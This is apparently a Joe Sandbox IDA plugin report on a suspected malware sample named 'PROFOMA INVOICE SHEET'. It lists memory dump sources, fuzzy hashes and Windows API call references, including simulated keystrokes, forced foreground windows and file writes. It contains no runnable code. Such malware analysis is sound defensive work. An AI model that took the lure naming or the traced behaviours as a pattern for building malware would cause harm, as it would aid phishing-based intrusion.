                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                    • Instruction ID: b390dc197e7b050c9a68e8737b582ee10b58dd61199ede0e138cd78ef2416b78
                                    • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                    • Instruction Fuzzy Hash: 500149B22047046BE3368F65D8C1A9AFBECFB89370F25051DE184872C0EB31A805C7B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                    • Instruction ID: 0aa66c70e7a8dce3ffc8df515c3d724c40040097a526ba5b41e3905ed70fe839
                                    • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                    • Instruction Fuzzy Hash: 2FF02832510B30ABC7333B69BC06B5B339C9F52331F110725F4209B1D2DB78E80186A5
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID:
                                    • API String ID: 176396367-0
                                    • Opcode ID: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                    • Instruction ID: 052cf40955bbb76b77a50ccd1dcfcc036207b3cf52d00fdb522d70ba79d35173
                                    • Opcode Fuzzy Hash: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                    • Instruction Fuzzy Hash: FCF028B36016007ED7169F28DC02BA7BB98EF44760F10852AF619CF1D2DB31E45087A0
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,00301129,00000000,?,00332E29,00000001,00000364,?,?,?,0032F2DE,00333863,003D1444,?,0031FDF5,?), ref: 00334CBE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 4547c4d31832d2cd71452fb347448c0f19fc82f9f438297f0dac26b904017dca
                                    • Instruction ID: 3ad35df8dc268cb1a8b30597aea0fc431a7f469e3af3fb2f917d74e5c62cd795
                                    • Opcode Fuzzy Hash: 4547c4d31832d2cd71452fb347448c0f19fc82f9f438297f0dac26b904017dca
                                    • Instruction Fuzzy Hash: 50F0E93160323477DB235F62AC45B5A378CFF41BA0F169122F815AA191CA70FC0147E0
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6,?,00301129), ref: 00333852
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 6b3ad1c708806588f1327377797e360ca9cfe328aec0306e6813f2bef8b6a75f
                                    • Instruction ID: e405e4774d795b154338020c53ac079e2f4636073abb88709ccb8a52cb951cc3
                                    • Opcode Fuzzy Hash: 6b3ad1c708806588f1327377797e360ca9cfe328aec0306e6813f2bef8b6a75f
                                    • Instruction Fuzzy Hash: 49E0E535101234A6E7232A66AC40B9A374CAF427B0F068021BC049E8A0CB11DD0582E5
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304F6D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: da8cbcec54772451c622caa2a559a311e2b79f067d3947617d69fbbe53598054
                                    • Instruction ID: b466feeae78cfb29fc3b705a89cc311f170401171695f3b10d9496bf8e1f880b
                                    • Opcode Fuzzy Hash: da8cbcec54772451c622caa2a559a311e2b79f067d3947617d69fbbe53598054
                                    • Instruction Fuzzy Hash: CDF030B1106752CFDB369F64E4A0822B7E4EF14319311897EE3DA82951C7319944DF10
                                    APIs
                                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0034EE51,003C3630,00000002), ref: 0036CD26
                                      • Part of subcall function 0036CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0036CD19,?,?,?), ref: 0036CC59
                                      • Part of subcall function 0036CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0036CD19,?,?,?,?,0034EE51,003C3630,00000002), ref: 0036CC6E
                                      • Part of subcall function 0036CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0036CD19,?,?,?,?,0034EE51,003C3630,00000002), ref: 0036CC7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: File$Pointer$Write
                                    • String ID:
                                    • API String ID: 3847668363-0
                                    • Opcode ID: 7df34a63cdd268f1e06450dfef9d15b70a068dd9224125fb8d940ef252c2c869
                                    • Instruction ID: 40b905c0dcb66d61ec9d21bcb9e1c8d9028b69173610d81810830db27a3b2f96
                                    • Opcode Fuzzy Hash: 7df34a63cdd268f1e06450dfef9d15b70a068dd9224125fb8d940ef252c2c869
                                    • Instruction Fuzzy Hash: 25E06D7A400704EFC7229F8ADD408AABBFCFF84360710852FE99AC2514D3B1AA14DB60
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00302DC4
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LongNamePath_wcslen
                                    • String ID:
                                    • API String ID: 541455249-0
                                    • Opcode ID: 1c6951574c93f276bff6187933c7a5b311f57d789c20d5334ff0f2d03cddbcce
                                    • Instruction ID: f2b9ff4c6978499c7ea764d002c535f51f6b2a4d9c1fa5044ede46ac80ffff74
                                    • Opcode Fuzzy Hash: 1c6951574c93f276bff6187933c7a5b311f57d789c20d5334ff0f2d03cddbcce
                                    • Instruction Fuzzy Hash: FAE0CD726001245BCB11D7589C06FDA77DDDFC8790F040171FD09DB24CD960AD848550
                                    APIs
                                      • Part of subcall function 00303837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00303908
                                      • Part of subcall function 0030D730: GetInputState.USER32 ref: 0030D807
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00302B6B
                                      • Part of subcall function 003030F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0030314E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                    • String ID:
                                    • API String ID: 3667716007-0
                                    • Opcode ID: 50fd281cf2b849cf19590ecc8d190e72c7e1bc65cbc2c4a3a97cd387b3677b90
                                    • Instruction ID: fbb78e761881dc1ea425a17b0109ce76cfb99e977826bb81c76bf0c2cebdb3ae
                                    • Opcode Fuzzy Hash: 50fd281cf2b849cf19590ecc8d190e72c7e1bc65cbc2c4a3a97cd387b3677b90
                                    • Instruction Fuzzy Hash: D7E07D2230320417C607BB75A87257EB36D8BD1311F40153FF1434B2E3CF2445494312
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00340704,?,?,00000000,?,00340704,00000000,0000000C), ref: 003403B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 4f54c3e838f68a22df99bcce4ccbd82ff2db422fab7e5328ea3c88127ccc7fe6
                                    • Instruction ID: 829cd73ea5c1005744cafb41a51275fc3909e73c3d1a87e37271e5c2f6e361fb
                                    • Opcode Fuzzy Hash: 4f54c3e838f68a22df99bcce4ccbd82ff2db422fab7e5328ea3c88127ccc7fe6
                                    • Instruction Fuzzy Hash: 5CD06C3205010DBBDF028F84DD06EDA3BAAFB48714F014000BE1856020C732E821AB94
                                    APIs
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00301CBC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem
                                    • String ID:
                                    • API String ID: 3098949447-0
                                    • Opcode ID: 51b3903a2685b2dc83a10b71f98c091d9f8e2a36ec96b5197a8410a9dfda6fbf
                                    • Instruction ID: 6e21bda2b469ad4ca4823125080d92cc5ea064801dda8065be97fd96c15b88a1
                                    • Opcode Fuzzy Hash: 51b3903a2685b2dc83a10b71f98c091d9f8e2a36ec96b5197a8410a9dfda6fbf
                                    • Instruction Fuzzy Hash: 1EC0923A281304AFF3178B85BC4AF11B76DA359B00F448003F609A95E3C3A22820EA50
                                    APIs
                                      • Part of subcall function 00305745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0030949C,?,00008000), ref: 00305773
                                    • GetLastError.KERNEL32(00000002,00000000), ref: 003776DE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateErrorFileLast
                                    • String ID:
                                    • API String ID: 1214770103-0
                                    • Opcode ID: 7456cc1366af00e068a27514751da4ab3cc4f99187edd037bca8755590ffe723
                                    • Instruction ID: 5f84db398881996aa0d534c82702ae52ccb658b9513d3443c04de0bd9ee091cf
                                    • Opcode Fuzzy Hash: 7456cc1366af00e068a27514751da4ab3cc4f99187edd037bca8755590ffe723
                                    • Instruction Fuzzy Hash: 8881C2306097019FC716EF28C4A1BAAB7E5AF49310F04855DF8895F2D6DB34ED45CB92
                                    APIs
                                    • CloseHandle.KERNELBASE(?,?,00000000,003424E0), ref: 00306266
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 58d0706fe0c881787ec28cfe29d86e40d598ef2c126575560d37cdec0226ce78
                                    • Instruction ID: 3e1c756783ef9b51603923df1e0562c1c706cfd05dc85c19b1057e3ee461476f
                                    • Opcode Fuzzy Hash: 58d0706fe0c881787ec28cfe29d86e40d598ef2c126575560d37cdec0226ce78
                                    • Instruction Fuzzy Hash: CCE09275401B01CEC3325F1AE925412FBE9FEE13613214E2ED0E5926A4D3B058968B50
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 03DBB721
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: fb9a7e3b24085aa1e00bdf402d35e51fabb8d103dc65fd11a55fc2fdd6415190
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: B0E0BF7494020DDFDB00EFB8D54969E7BB4EF04301F1001A1FD0192281D67099508A62
                                    APIs
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0039961A
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0039965B
                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0039969F
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003996C9
                                    • SendMessageW.USER32 ref: 003996F2
                                    • GetKeyState.USER32(00000011), ref: 0039978B
                                    • GetKeyState.USER32(00000009), ref: 00399798
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003997AE
                                    • GetKeyState.USER32(00000010), ref: 003997B8
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003997E9
                                    • SendMessageW.USER32 ref: 00399810
                                    • SendMessageW.USER32(?,00001030,?,00397E95), ref: 00399918
                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0039992E
                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00399941
                                    • SetCapture.USER32(?), ref: 0039994A
                                    • ClientToScreen.USER32(?,?), ref: 003999AF
                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003999BC
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003999D6
                                    • ReleaseCapture.USER32 ref: 003999E1
                                    • GetCursorPos.USER32(?), ref: 00399A19
                                    • ScreenToClient.USER32(?,?), ref: 00399A26
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00399A80
                                    • SendMessageW.USER32 ref: 00399AAE
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00399AEB
                                    • SendMessageW.USER32 ref: 00399B1A
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00399B3B
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00399B4A
                                    • GetCursorPos.USER32(?), ref: 00399B68
                                    • ScreenToClient.USER32(?,?), ref: 00399B75
                                    • GetParent.USER32(?), ref: 00399B93
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00399BFA
                                    • SendMessageW.USER32 ref: 00399C2B
                                    • ClientToScreen.USER32(?,?), ref: 00399C84
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00399CB4
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00399CDE
                                    • SendMessageW.USER32 ref: 00399D01
                                    • ClientToScreen.USER32(?,?), ref: 00399D4E
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00399D82
                                      • Part of subcall function 00319944: GetWindowLongW.USER32(?,000000EB), ref: 00319952
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00399E05
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                    • String ID: @GUI_DRAGID$F$p#=
                                    • API String ID: 3429851547-3009530268
                                    • Opcode ID: ec1d4110d3fbfc92c4fbaae27640524ce4a4aecfb856f3e6648b687732b89db3
                                    • Instruction ID: 7603bdf815d25ebe59cd5f9850c976f10ad63670c0ca4ac298d0f4e240ee4ab2
                                    • Opcode Fuzzy Hash: ec1d4110d3fbfc92c4fbaae27640524ce4a4aecfb856f3e6648b687732b89db3
                                    • Instruction Fuzzy Hash: BC428D35604241AFDB26CF68CC54BAABBE9FF49320F15061EF699872A1D731E890CF51
                                    APIs
                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 003948F3
                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00394908
                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00394927
                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0039494B
                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0039495C
                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0039497B
                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 003949AE
                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 003949D4
                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00394A0F
                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00394A56
                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00394A7E
                                    • IsMenu.USER32(?), ref: 00394A97
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00394AF2
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00394B20
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00394B94
                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00394BE3
                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00394C82
                                    • wsprintfW.USER32 ref: 00394CAE
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00394CC9
                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00394CF1
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00394D13
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00394D33
                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00394D5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                    • String ID: %d/%02d/%02d
                                    • API String ID: 4054740463-328681919
                                    • Opcode ID: ef7af9eb6b9676049236ab4dca91929776494200f403e6496c93cbccc7b98d5b
                                    • Instruction ID: e37b3c322e8352a95d35950296d033616e50eb554f5b0fda58b6fa8068808188
                                    • Opcode Fuzzy Hash: ef7af9eb6b9676049236ab4dca91929776494200f403e6496c93cbccc7b98d5b
                                    • Instruction Fuzzy Hash: D712D071600215ABEF269F28CC49FAEBBF8EF45710F14412AF516EB2E1DB749942CB50
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0031F998
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0035F474
                                    • IsIconic.USER32(00000000), ref: 0035F47D
                                    • ShowWindow.USER32(00000000,00000009), ref: 0035F48A
                                    • SetForegroundWindow.USER32(00000000), ref: 0035F494
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0035F4AA
                                    • GetCurrentThreadId.KERNEL32 ref: 0035F4B1
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0035F4BD
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0035F4CE
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0035F4D6
                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0035F4DE
                                    • SetForegroundWindow.USER32(00000000), ref: 0035F4E1
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035F4F6
                                    • keybd_event.USER32(00000012,00000000), ref: 0035F501
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035F50B
                                    • keybd_event.USER32(00000012,00000000), ref: 0035F510
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035F519
                                    • keybd_event.USER32(00000012,00000000), ref: 0035F51E
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035F528
                                    • keybd_event.USER32(00000012,00000000), ref: 0035F52D
                                    • SetForegroundWindow.USER32(00000000), ref: 0035F530
